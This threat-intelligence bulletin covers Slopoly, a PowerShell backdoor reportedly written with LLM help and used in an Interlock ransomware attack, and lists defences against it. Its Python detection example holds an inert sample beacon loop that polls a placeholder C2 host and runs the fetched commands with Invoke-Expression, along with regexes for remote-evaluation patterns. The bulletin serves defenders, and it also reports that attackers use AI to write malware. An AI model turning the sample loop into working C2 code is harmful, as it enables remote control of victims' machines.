AI-Generated Slopoly Malware Used in Interlock Ransomware Attack
Summary:
IBM X-Force has identified a new malware strain dubbed "Slopoly," which represents a significant milestone in the evolution of offensive AI. Attributed to the financially motivated threat group Hive0163, the malware was recently deployed during an Interlock ransomware attack. Slopoly is a PowerShell-based backdoor that functions as a Command and Control (C2) persistence client. While the malware itself is not technically advanced, its code structure—characterized by unusually detailed comments, verbose logging, and highly structured error handling—strongly suggests it was authored or heavily assisted by a Large Language Model (LLM).
The attack chain typically begins with a "ClickFix" social engineering ruse, leading to the deployment of Slopoly in the C:\ProgramData\Microsoft\Windows\Runtime\ directory. Once active, the script collects system information, establishes persistence, and beacons to a C2 server every 30 to 50 seconds to receive and execute remote commands. Despite being marketed in its own code as "polymorphic," researchers found no evidence of self-modification, suggesting that the "polymorphism" may simply refer to the AI's ability to generate slightly varied iterations of the same script to evade static signatures.
Security Officer Comments:
The emergence of Slopoly is a "canary in the coal mine" for the commoditization of custom malware. Historically, creating unique, functional backdoors required a specific level of coding expertise; however, Slopoly demonstrates that AI is effectively lowering the barrier to entry for lower-tier threat actors. By using LLMs, even unsophisticated attackers can rapidly iterate on scripts that bypass traditional, signature-based antivirus solutions that rely on known "malicious" patterns.
The impact on our member base is twofold. First, the speed of the "attacker lifecycle" is accelerating. Because AI can generate dozens of variations of a script like Slopoly in seconds, defenders can no longer rely on static Indicators of Compromise (IoCs) like file hashes. Second, the use of PowerShell for these AI-generated scripts allows attackers to "live off the land," using legitimate administrative tools to mask their presence. For organizations, especially those in manufacturing or critical infrastructure where legacy systems may be prevalent, this means that even a "simple" script can facilitate long-term dwell time and eventual data exfiltration if behavior-based detection is not prioritized.
Suggested Corrections:
X-Force recommends defenders:
- Implement security measures against ClickFix, such as disabling the “Win+R” command, or monitoring the RunMRU registry key.
- Prioritize behavior-based detections as opposed to relying on signature-based or malware-specific detection mechanisms.
- Hunt for the Hive0163-associated IoCs below in your environment.
As additional recommendations to defend against AI-enhanced threats like Slopoly, organizations should adopt a multi-layered defense strategy focused on behavioral detection and environment hardening:
- Implement Behavioral Monitoring (EDR/XDR): Since Slopoly's static signature can be easily changed by an AI re-write, focus on detecting its behaviors. Monitor for PowerShell scripts initiating outbound network connections to unknown IPs or executing encoded commands from uncommon directories like \ProgramData\.
- Enforce PowerShell Constrained Language Mode: Restrict the capabilities of PowerShell to prevent the execution of advanced functions often used by backdoors while still allowing legitimate administrative tasks to function.
- Audit "ClickFix" and Social Engineering: Conduct targeted user awareness training regarding "ClickFix" lures—which often masquerade as browser updates or "fix-it" buttons—as these remain the primary entry point for Hive0163.
- Log and Monitor Script Execution: Enable enhanced PowerShell logging (Script Block Logging and Module Logging) to capture the full content of executed scripts. This is critical for identifying the "verbose" and "comment-heavy" code structures indicative of AI-generated malware.
- Restrict Persistence Locations: Monitor and restrict write access to common persistence directories such as C:\ProgramData\Microsoft\Windows\Runtime\ and ensure that any new service or scheduled task creation triggers an immediate alert for the SOC.
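As an added example (not from the X-Force report and not the Slopoly sample itself), the Python below runs the behavioral checks from the list above (load path under ProgramData, poll-sleep-execute loop, remote evaluation, unusually dense commenting) over constructed records shaped like Script Block Logging events; the file paths, the sample script text, the rule regexes and the alert threshold are all assumptions.

```python
import re
# Constructed sample records shaped like PowerShell Script Block Logging
# (Event ID 4104) entries, reduced to the two fields the rules need.
SAMPLE_EVENTS = [
    {"path": r"C:\ProgramData\Microsoft\Windows\Runtime\update.ps1",
     "script": "\n".join([
         "# Polymorphic persistence client (constructed, inert sample)",
         "# Step 1: collect host details for the initial check-in",
         "$info = Get-ComputerInfo | Select-Object CsName, OsName",
         "# Step 2: poll for tasks and run them, logging each step",
         "while ($true) {",
         "    $task = Invoke-RestMethod -Uri 'http://c2.invalid/poll'",
         "    Write-Host '[INFO] task received'; Invoke-Expression $task",
         "    Start-Sleep -Seconds (Get-Random -Minimum 30 -Maximum 50)",
         "}"])},
    {"path": r"C:\Scripts\restart-spooler.ps1",
     "script": "# Nightly print spooler bounce\nRestart-Service -Name Spooler"},
]

def _has(pattern, text):
    return re.search(pattern, text, re.IGNORECASE) is not None

def uncommon_dir(path, script):
    # Script loaded from a ProgramData subtree, the drop location in the report
    return _has(r"\\ProgramData\\", path)

def beacon_loop(path, script):
    # Loop + outbound web call + sleep: the poll-and-execute shape of the backdoor
    return (_has(r"\bwhile\b", script)
            and _has(r"Invoke-(RestMethod|WebRequest)|Net\.WebClient", script)
            and _has(r"Start-Sleep", script))

def remote_eval(path, script):
    # Fetched content handed to the interpreter or decoded from base64
    return _has(r"Invoke-Expression|\biex\b|FromBase64String|-EncodedCommand", script)

def comment_heavy(path, script):
    # Weak signal: the unusually dense commenting noted for LLM-authored scripts
    lines = [l for l in script.splitlines() if l.strip()]
    return len(lines) >= 4 and sum(l.lstrip().startswith("#") for l in lines) / len(lines) >= 0.3

RULES = [uncommon_dir, beacon_loop, remote_eval, comment_heavy]
def analyze(event):
    """Names of the behavioral rules that fire for one script-block event."""
    return [r.__name__ for r in RULES if r(event["path"], event["script"])]

def triage(events, threshold=2):
    """Events where at least `threshold` rules fire: the hunt output for the SOC."""
    return [(e["path"], analyze(e)) for e in events if len(analyze(e)) >= threshold]
```

Feeding real 4104 events requires only mapping the ScriptBlockText and Path fields into the same two keys; the single-rule hits stay below the threshold so a lone admin script in ProgramData does not page anyone.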
Link(s):
https://www.bleepingcomputer.com/ne...-malware-used-in-interlock-ransomware-attack/